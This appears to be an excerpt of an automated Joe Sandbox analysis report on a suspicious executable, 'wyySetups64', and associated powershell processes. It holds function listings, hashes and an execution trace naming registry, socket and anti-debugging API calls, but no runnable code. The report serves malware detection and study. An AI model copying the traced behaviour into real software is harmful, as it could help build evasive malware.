                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                                                                                                              • String ID: vector<T> too long
                                                                                                                                                                                                              • API String ID: 1785806476-3788999226
                                                                                                                                                                                                              • Opcode ID: 5e08fb12126b45a7a5d89626b0289a3c9ed07cc8e99753a4e7f08ba83f742afb
                                                                                                                                                                                                              • Instruction ID: 6290e06831e5d6a3b2caaf3b52127a4f641c694e54a680ba1c3a534f987df871
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e08fb12126b45a7a5d89626b0289a3c9ed07cc8e99753a4e7f08ba83f742afb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F01D876E006119FC710EE6DECC1C2E779CEA403D0F49032AEC12D7618E774E8158790
                                                                                                                                                                                                              Function 03378430 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 03378443
                                                                                                                                                                                                                • Part of subcall function 0337EF39: std::exception::exception.LIBCMT ref: 0337EF4E
                                                                                                                                                                                                                • Part of subcall function 0337EF39: __CxxThrowException@8.LIBCMT ref: 0337EF63
                                                                                                                                                                                                                • Part of subcall function 0337EF39: std::exception::exception.LIBCMT ref: 0337EF74
                                                                                                                                                                                                              • _memmove.LIBCMT ref: 0337846E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                                                                                                              • String ID: vector<T> too long
                                                                                                                                                                                                              • API String ID: 1785806476-3788999226
                                                                                                                                                                                                              • Opcode ID: 1e3d4425556e70a9284522aa55ace569c0c223cf720445ab0b7829365e36a9fb
                                                                                                                                                                                                              • Instruction ID: b101c2e359eaf9f45bbcd0634a6a9dca8ef4a7c3104ac82b750a6021231d8bfb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e3d4425556e70a9284522aa55ace569c0c223cf720445ab0b7829365e36a9fb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5801A2B1A003059FDB34DEA8DCD692BB3D8EF542103184A2DE45ACB740E678F841C761
                                                                                                                                                                                                              Function 00B33414 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116355062.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_b20000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CallFrame@12Setting__getptd
                                                                                                                                                                                                              • String ID: j
                                                                                                                                                                                                              • API String ID: 3454690891-2137352139
                                                                                                                                                                                                              • Opcode ID: 2a3c231524d2f5714940ff7c9f67256147f183406962bf184a7791e03a03933a
                                                                                                                                                                                                              • Instruction ID: 22fa1a9c4ef952915901115b9df0d178554ddd66841ae8587c38225de05b3b4b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a3c231524d2f5714940ff7c9f67256147f183406962bf184a7791e03a03933a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 19118B71800264EBCB12DF58C4853ADBBF0FF01B24F2481C9E4992B683C3746E92DB91
                                                                                                                                                                                                              Function 00BE37C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BE32AE: __getptd.LIBCMT ref: 00BE32B4
                                                                                                                                                                                                                • Part of subcall function 00BE32AE: __getptd.LIBCMT ref: 00BE32C4
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00BE37D8
                                                                                                                                                                                                                • Part of subcall function 00BD990F: __getptd_noexit.LIBCMT ref: 00BD9912
                                                                                                                                                                                                                • Part of subcall function 00BD990F: __amsg_exit.LIBCMT ref: 00BD991F
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00BE37E6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                              • API String ID: 803148776-1018135373
                                                                                                                                                                                                              • Opcode ID: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
                                                                                                                                                                                                              • Instruction ID: 990f0869ed05cccf66858672050a1cc4b8bd38e02ffa315c718fb20344900b77
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D016D368012858BCF349F27C4586ACB3F5EF60B12F5445AEF49057761CB34AB81CB11
                                                                                                                                                                                                              Function 033906D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 0339010A: __getptd.LIBCMT ref: 03390110
                                                                                                                                                                                                                • Part of subcall function 0339010A: __getptd.LIBCMT ref: 03390120
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 033906E3
                                                                                                                                                                                                                • Part of subcall function 03383E5B: __getptd_noexit.LIBCMT ref: 03383E5E
                                                                                                                                                                                                                • Part of subcall function 03383E5B: __amsg_exit.LIBCMT ref: 03383E6B
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 033906F1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                              • API String ID: 803148776-1018135373
                                                                                                                                                                                                              • Opcode ID: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
                                                                                                                                                                                                              • Instruction ID: 1ae5ea426948afbf23a40f8be825a07eda7adc536c4536595022c52af38eca2c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 87012839801305CEEF39EF66CCC46ADB7FAAF04221F58486FE0999A260DB309581CE41
                                                                                                                                                                                                              Function 03210093 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 032100A2
                                                                                                                                                                                                                • Part of subcall function 0320381A: __getptd_noexit.LIBCMT ref: 0320381D
                                                                                                                                                                                                                • Part of subcall function 0320381A: __amsg_exit.LIBCMT ref: 0320382A
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 032100B0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4119630030.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_31f0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                              • API String ID: 803148776-1018135373
                                                                                                                                                                                                              • Opcode ID: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
                                                                                                                                                                                                              • Instruction ID: 16305e55ab82e18a4ac771d370ee930814512271c2e06b862b64aabdc2e6e692
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1501D6388203039ECF74DF24D640A6DB7F8AF20611F28C45ED4C1BA191CB7895E5CB40
                                                                                                                                                                                                              Function 00B337A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00B337AF
                                                                                                                                                                                                                • Part of subcall function 00B298E6: __getptd_noexit.LIBCMT ref: 00B298E9
                                                                                                                                                                                                                • Part of subcall function 00B298E6: __amsg_exit.LIBCMT ref: 00B298F6
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00B337BD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116355062.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_b20000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                              • API String ID: 803148776-1018135373
                                                                                                                                                                                                              • Opcode ID: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
                                                                                                                                                                                                              • Instruction ID: 214d0e5c49c5586d055bd7373a1c8c18a543428d965d5221a22133785fc9077a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20014B74C01205CACF349F21D444AAEB3F5EF14B11F7488ADF4445A252DB319B81DB51

                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                              Function 035429F0 Relevance: .2, Instructions: 209COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.1773865788.0000000003540000.00000040.00000800.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_3540000_powershell.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: a2929c5d23fa93998b819d1c85437157b6631c24bf8f6e5cb8e2541610d9b653
                                                                                                                                                                                                              • Instruction ID: d2f82058989c48e1970dabb7c8c775c19719f6fb23440afb6e3acb6d83ef6b1c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a2929c5d23fa93998b819d1c85437157b6631c24bf8f6e5cb8e2541610d9b653
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D9919C74A002159FCB19CF9DC4949AEFBB1FF88314F288599E815AB365C735EC91CBA0
                                                                                                                                                                                                              Function 03542B00 Relevance: .1, Instructions: 108COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.1773865788.0000000003540000.00000040.00000800.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_3540000_powershell.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 84def035c1604146a37ff09512a8ff06416126bf1bf7659c04519cd3da0c7e18
                                                                                                                                                                                                              • Instruction ID: 80ebc4e5664316015a1a155a734caaee83117fde0e911a27a8b57ed2e5b431f1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 84def035c1604146a37ff09512a8ff06416126bf1bf7659c04519cd3da0c7e18
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0A415BB4A005159FCB0ACF48C4989AEFBB1FF48314F158599D855AB364C736FC91CBA0
                                                                                                                                                                                                              Function 03542C95 Relevance: .1, Instructions: 91COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.1773865788.0000000003540000.00000040.00000800.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_3540000_powershell.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 9e7f3614999e06b04d736a512c3eed864e2f288015e81412bb5ff2c2606910ee
                                                                                                                                                                                                              • Instruction ID: f14ba91bf36d031e2425c298037a361422773fa6b492ed17c56fa7d2a4b1d2b9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9e7f3614999e06b04d736a512c3eed864e2f288015e81412bb5ff2c2606910ee
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E93104706086519FCB0BCF68D4A89E9FB71FF05324F0985CAD4519B2A2C726EC46CBA1
                                                                                                                                                                                                              Function 0339D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.1773487462.000000000339D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0339D000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_339d000_powershell.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: a0408e8cda36cfbce4fc8c2e70f351151a05a1c325428f921bb8f189f2084655
                                                                                                                                                                                                              • Instruction ID: 4d8fcfc6ae7b5e9845838a977f176a492c5ae4b1ba4b42e528d5c8ba75da2690
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a0408e8cda36cfbce4fc8c2e70f351151a05a1c325428f921bb8f189f2084655
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7301DF71008344DAFB209A29CCC5B66FF9CEF51325F0DC55AEC090B782C67D9841C6B1
                                                                                                                                                                                                              Function 0339D007 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.1773487462.000000000339D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0339D000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_339d000_powershell.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: c51e641265993e3faabd22d596dfee88be2d6d7b35910034f6ae5d8aba853574
                                                                                                                                                                                                              • Instruction ID: d65db601472b7ad002f83185a4820cb4497135426778f5352d21c4e210d0bbd3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c51e641265993e3faabd22d596dfee88be2d6d7b35910034f6ae5d8aba853574
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F001ED6240E3C09EE7128B258C95B52BFB4DF57224F1D81DBD9888F2A7C2695845C772
                                                                                                                                                                                                              Function 03542C5C Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.1773865788.0000000003540000.00000040.00000800.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_3540000_powershell.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 44309d3c986ccd65e804ddcb2d4b6be4a9af8ab6c8625774db97201bb3c14b77
                                                                                                                                                                                                              • Instruction ID: 3e11699e126e5460352010385cbd91f7b8c62e000c99b60d777e31c1474799ac
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 44309d3c986ccd65e804ddcb2d4b6be4a9af8ab6c8625774db97201bb3c14b77
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9B01B531909290AFCB07CBACD8609E9BFB0EF4A224F1985C6D0549B2A2C2369855CB65

                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                              Function 02E2D005 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000007.00000002.1765090799.0000000002E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E2D000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_7_2_2e2d000_powershell.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 8ad33894782bb9ff20a5dc2b1dfebab09788ffd92d5a23930defe2b1df890d54
                                                                                                                                                                                                              • Instruction ID: e542b9af3faed3a7e356bb618e35e92a51d0a6a4699be707d23c4a75b6053088
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8ad33894782bb9ff20a5dc2b1dfebab09788ffd92d5a23930defe2b1df890d54
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C5015E6204E3C09EE7128B258D94B52BFB4DF57228F1DC1DBD9898F1A3C2695849C772
                                                                                                                                                                                                              Function 02E2D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000007.00000002.1765090799.0000000002E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E2D000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_7_2_2e2d000_powershell.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: d1367860eaf6bc3dbb39115be7ab2d8967e87c2c036bb3776a8fed373c40175e
                                                                                                                                                                                                              • Instruction ID: 5542b0faf8403947cc40f7becf5e6a98b38e7cc6ca8fefcf9f737dbd817adb37
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d1367860eaf6bc3dbb39115be7ab2d8967e87c2c036bb3776a8fed373c40175e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 400126710483549AE7208A29CDC4F67FFD8DF51339F08C41AEE4A4B292C7B89849C7B1

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:6.9%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                              Signature Coverage:2.5%
                                                                                                                                                                                                              Total number of Nodes:2000
                                                                                                                                                                                                              Total number of Limit Nodes:140
                                                                                                                                                                                                              execution_graph 142856 6cda5bd8 142857 6cda5be1 142856->142857 142859 6cda5bee 142857->142859 142860 6cda5b5c 142857->142860 142870 6cde23d1 142860->142870 142864 6cda5b83 142874 6cddd47e 142864->142874 142866 6cda5b92 142867 6cda5b9a _memset 142866->142867 142869 6cda5bb0 142866->142869 142869->142859 142880 6cde230b 142870->142880 142872 6cda5b71 142872->142869 142873 6cde2fa4 10 API calls 2 library calls 142872->142873 142873->142864 142875 6cddd51d 142874->142875 142878 6cddd490 142874->142878 142875->142866 142876 6cddd4a1 __FF_MSGBANNER __NMSG_WRITE 142876->142878 142877 6cddd4ed RtlAllocateHeap 142877->142878 142878->142875 142878->142876 142878->142877 142882 6cde2317 142880->142882 142881 6cde232a 142901 6cdde312 5 API calls __decode_pointer 142881->142901 142882->142881 142883 6cde2360 __getstream 142882->142883 142885 6cde2379 142883->142885 142889 6cde233f 142883->142889 142885->142889 142890 6cdefeb4 142885->142890 142889->142872 142891 6cdefed7 __wopenfile 142890->142891 142892 6cdefef1 142891->142892 142897 6cdf00b1 __wcsnicmp 142891->142897 142898 6cdf00c5 142891->142898 142906 6cdde312 5 API calls __decode_pointer 142892->142906 142894 6cdf0123 142903 6cdf8d6c 142894->142903 142897->142898 142899 6cdf00d0 __wcsnicmp 142897->142899 142898->142892 142898->142894 142899->142898 142900 6cdf00ef __wcsnicmp 142899->142900 142900->142892 142900->142898 142907 6cdf8ca0 142903->142907 142909 6cdf8cac 142907->142909 142978 6bf26f71 143013 6bf26dcb RegOpenKeyExW 142978->143013 142981 6bf26fb7 143046 6bf384d6 142981->143046 142982 6bf26fbe RegQueryValueExW 142983 6bf26ff2 RegQueryValueExW 142982->142983 142984 6bf26fea 142982->142984 142986 6bf27016 142983->142986 142987 6bf2701e RegQueryValueExW 142983->142987 142984->142983 142986->142987 142989 6bf27042 142987->142989 142990 6bf2704a RegQueryValueExW 142987->142990 142988 6bf2726c 142989->142990 142991 6bf2706e 142990->142991 142992 6bf270aa RegQueryValueExW 142991->142992 142993 6bf2707e RegQueryValueExW 142991->142993 142995 6bf270d6 RegQueryValueExW 142992->142995 142996 6bf270ce 142992->142996 142993->142992 142994 6bf270a2 142993->142994 142994->142992 142997 6bf270fa 142995->142997 142998 6bf2710c RegQueryValueExW 142995->142998 142996->142995 142997->142998 142999 6bf27130 142998->142999 143000 6bf27138 RegQueryValueExW 142998->143000 142999->143000 143001 6bf27164 RegQueryValueExW 143000->143001 143002 6bf2715c 143000->143002 143003 6bf271a6 143001->143003 143005 6bf27186 _wcsncpy 143001->143005 143002->143001 143043 6bee756e 143003->143043 143035 6bf59fd7 143005->143035 143014 6bf26e04 RegCreateKeyExW 143013->143014 143015 6bf26dfc 143013->143015 143014->143015 143016 6bf26e21 RegOpenKeyExW 143014->143016 143015->142981 143015->142982 143016->143015 143017 6bf26e37 RegCreateKeyExW 143016->143017 143017->143015 143018 6bf26e58 143017->143018 143018->143015 143019 6bf26e5e RegOpenKeyExW 143018->143019 143019->143015 143020 6bf26e7b 143019->143020 143054 6bf26d23 7 API calls 2 library calls 143020->143054 143022 6bf26e8b 143055 6bf26d23 7 API calls 2 library calls 143022->143055 143024 6bf26e9b 143056 6bf26d23 7 API calls 2 library calls 143024->143056 143026 6bf26eab 143057 6bf26d23 7 API calls 2 library calls 143026->143057 143047 6bf384e0 IsDebuggerPresent 143046->143047 143048 6bf384de 143046->143048 143085 6bf3ee79 143047->143085 143048->142988 143051 6bf3f772 SetUnhandledExceptionFilter UnhandledExceptionFilter 143052 6bf3f797 GetCurrentProcess TerminateProcess 143051->143052 143053 6bf3f78f __invoke_watson 143051->143053 143052->142988 143053->143052 143054->143022 143055->143024 143056->143026 143085->143051 143086 6bf11979 143149 6bf38390 143086->143149 143088 6bf11992 RegQueryValueExW 143089 6bf11a0d RegCloseKey 143088->143089 143094 6bf119c1 _wcsrchr 143088->143094 143090 6bf38390 _memset 143089->143090 143091 6bf11a31 GetTempPathW 143090->143091 143151 6bee9134 143091->143151 143096 6bee9134 ctype 75 API calls 143094->143096 143096->143089 143150 6bf3839c __VEC_memzero 143149->143150 143150->143088 143152 6bee9140 _wcslen 143151->143152 143239 6bee9034 143152->143239 143154 6bee914d GetModuleFileNameW 143240 6bee9044 ctype 143239->143240 143241 6bee9068 143240->143241 143242 6bee9048 143240->143242 143248 6bee8b0a 143241->143248 143244 6bee8fa1 ctype 75 API calls 143242->143244 143247 6bee9066 ctype 143244->143247 143247->143154 143249 6bee8b1f 143248->143249 143250 6bee8b1a 143248->143250 143252 6bee8b24 143249->143252 143254 6bee8b31 143249->143254 143266 6bf51fb5 75 API calls 3 library calls 143250->143266 143460 b3553b 143461 b3554c 143460->143461 143474 b31e26 143461->143474 143463 b355f1 143464 b31e26 RaiseException 143463->143464 143465 b35604 143464->143465 143478 b34994 143465->143478 143467 b3561b ctype 143475 b31e3b _wcslen 143474->143475 143529 b2db68 143475->143529 143477 b31e58 _wcscpy 143477->143463 143541 b95421 143478->143541 143480 b349a0 GetCurrentThreadId 143481 b349b0 std::locale::_Init ctype 143480->143481 143482 b349cd 143480->143482 143481->143467 143482->143481 143542 b2dc27 143482->143542 143530 b2db76 143529->143530 143533 b2dbb9 ctype _wcsncpy 143529->143533 143531 b2dbad 143530->143531 143535 b94656 RaiseException 143530->143535 143531->143533 143536 b2db3c 143531->143536 143533->143477 143535->143531 143537 b2db4a _wcslen 143536->143537 143538 b2db66 143537->143538 143540 b94656 RaiseException 143537->143540 143538->143533 143540->143538 143541->143480 143806 6bf32c7a 143807 6bf32d32 143806->143807 143808 6bf32c8e 143806->143808 143808->143807 143809 6bf23f7c ctype 111 API calls 143808->143809 143810 6bf32cdd 143808->143810 143812 6bf32cd1 143809->143812 143810->143807 143811 6bf32d39 143810->143811 143813 6bf32d2b 143810->143813 143821 6bf32be6 143811->143821 143833 6bf35f4c 143812->143833 143842 6bf32b06 143813->143842 143818 6bf38425 ctype 75 API calls 143819 6bf32d5e 143818->143819 143854 6bf32675 143821->143854 143824 6bf23f7c ctype 111 API calls 143825 6bf32c07 GetTickCount 143824->143825 143825->143818 143873 6bf3325b 143833->143873 143835 6bf35f5c 143891 6bf35ece 143835->143891 143843 6bf32b17 143842->143843 143848 6bf32b33 143842->143848 146040 6bf326da 143843->146040 143845 6bf32b68 143846 6bf32b8b 143845->143846 143847 6bf326da 73 API calls 143845->143847 143849 6bf326da 73 API calls 143846->143849 143852 6bf32bae 143846->143852 143847->143846 143848->143845 143851 6bf326da 73 API calls 143848->143851 143849->143852 143850 6bf32be3 143850->143807 143851->143845 143852->143850 143853 6bf326da 73 API calls 143852->143853 143853->143850 143858 6bf321ac socket 143854->143858 143857 6bf3269e 143857->143824 143859 6bf321d2 _memset 143858->143859 143860 6bf3222d 143858->143860 143862 6bf321e0 htonl htons 143859->143862 143861 6bf384d6 _strlwr_s_l_stat 5 API calls 143860->143861 143863 6bf3223f closesocket 143861->143863 143864 6bf3221b bind 143862->143864 143865 6bf3220a 143862->143865 143863->143857 143864->143860 143865->143864 143866 6bf32213 htonl 143865->143866 143866->143864 143888 6bf33267 __EH_prolog3 143873->143888 143874 6bf38425 ctype 75 API calls 143874->143888 143875 6bf38425 ctype 75 API calls 143890 6bf3331c 143875->143890 143876 6bf334d2 115 API calls 143876->143890 143878 6bf333cd 143879 6bf23f7c ctype 111 API calls 143878->143879 143882 6bf333e6 143879->143882 143880 6befb0e4 68 API calls 143880->143890 143881 6bf23f7c ctype 111 API calls 143881->143888 143889 6bf33270 std::runtime_error::runtime_error 143882->143889 143924 6bf330ca 114 API calls ctype 143882->143924 143883 6bf23f7c ctype 111 API calls 143883->143890 143888->143874 143888->143881 143888->143889 